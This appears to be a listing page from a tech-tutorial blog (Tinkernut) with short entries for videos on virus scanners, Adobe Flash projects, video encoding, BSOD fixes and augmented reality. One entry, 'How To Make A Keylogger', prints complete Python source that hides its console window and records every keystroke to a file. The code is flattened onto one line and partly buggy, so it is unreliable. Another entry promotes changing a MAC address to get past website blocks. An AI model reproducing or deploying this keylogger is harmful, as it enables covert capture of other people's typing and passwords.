This video compares the most popular virus scanners to see which one’s are the best.
-
Best Virus Scanner?
// davisde // Safety & Security, Software Tips Tags: protect, secure, tinkernut, tricks, tutorial, virus 5 Responses
This video compares the most popular virus scanners to see which one’s are the best. -
How To Make A Keylogger
// davisde // Hacks, Programming Tips Tags: computer, hack, hacking, keyboard, keylogger, programming, python, scripts, tinkernut, tips, tricks, tutorial 38 Responses
KEYLOGGER SOURCECODE AND
– Download Python: http://www.python.org/
– Download Pyhook: pyhook.sourceforge.net
– Download Python for Windows Extensions: http://sourceforge.net/projects/pywin32/
SOURCE:
import win32api import win32console import win32gui import pythoncom, pyHook win = win32console.GetConsoleWindow() win32gui.ShowWindow(win,0) def OnKeyboardEvent(event): if event.Ascii==5: _exit(1) if event.Ascii != 0 or 8: f=open('c:output.txt','r') buffer=f.read() f.close() f=open('c:output.txt','w') keylogs=chr(event.Ascii) if event.Ascii==13: keylogs='/n' buffer += keylogs f.write(buffer) f.close() hm = pyHook.HookManager() hm.KeyDown = OnKeyboardEvent hm.HookKeyboard() pythoncom.PumpMessages()
-
Howcast & Tinkernut: How To Create an Adobe Flash Video Player
// davisde // Howcast & Tinkernut, Programming Tips Tags: actionscript, flash, Howcast & Tinkernut, player, programming, tinkernut, Video 34 Responses
You’ve just returned from vacation and have tons of videos to share. Create your own custom video player to showcase these memories online. Inspired by the Instructables project: http://www.instructables.com/id/How-To-Create-an-Adobe-Flash-Video-Player/
-
Hacking Tip: Change Your MAC Address
// davisde // Hacks Tags: address, block, bypass, change, game, hack, hacking, hide, ip, mac, sites, tips, tricks, tutorial, website 3 Responses
This video will show you how to bypass websites that have blocked you by changing your MAC address, which will change your IP address. You can download now download it from this link: http://www.tinkernut.com/demos/205_mac/macmakeup195d.zip
-
Howcast & Tinkernut: How To Animate in Adobe Flash
// davisde // Howcast & Tinkernut, Programming Tips, Video Tags: adobe, animate, animations, flash, how, Howcast & Tinkernut, tinkernut, to 5 Responses
Static images can cause your web site to fade into the background. Learn the basics of animating them using Adobe Flash CS4. View the Instructables steps at: http://www.instructables.com/id/How-to-Animate-in-Adobe-Flash/
-
The Basics Of Video Encoding
// davisde // Multimedia Tips, Programming Tips, Software Tips Tags: convert, decode, encode, format, guide, help, multimedia, tutorial, Video 5 Responses
This video covers the basics of converting and encoding videos.
-
How To Fix A Windows BSOD
// davisde // Safety & Security, Video Tags: 7, boot, data, safe, screen, tinkernut, tips, tricks, tutorial, vista, windows, xp 18 Responses
This video covers the basics of how to fix the most common Windows Blue Screen Errors, commonly referred to as the Blue Screen of Death (BSOD).
-
How To Create Augmented Reality Apps
// davisde // DIY Projects, Programming Tips, Video Tags: actionscript, adobe, augmented, flash, programming, reality, tinkernut, webcam 34 Responses
This video covers the very basics of creating an Augmented Reality (AR) application using FLARToolkit and Adobe Flex.
Download the marker: http://www.tinkernut.com/downl…..marker.pdf
Visit this webpage, allow access to your webcam, and hold the marker in front of the camera: http://www.tinkernut.com/downl…..ality.html
Download the source files here: http://www.tinkernut.com/downl…..eality.zip>
-
Howcast & Tinkernut: How To Make An Adobe Flash Photo Gallery
// davisde // Howcast & Tinkernut, Multimedia Tips, Programming Tips Tags: actionscript, adobe, flash, Howcast & Tinkernut, photo, picture, pictures, programming, tinkernut, tips, tricks, tutorial, web 8 Responses
Don’t just send people a stack of static photo files; share them in style by creating a photo gallery in Flash.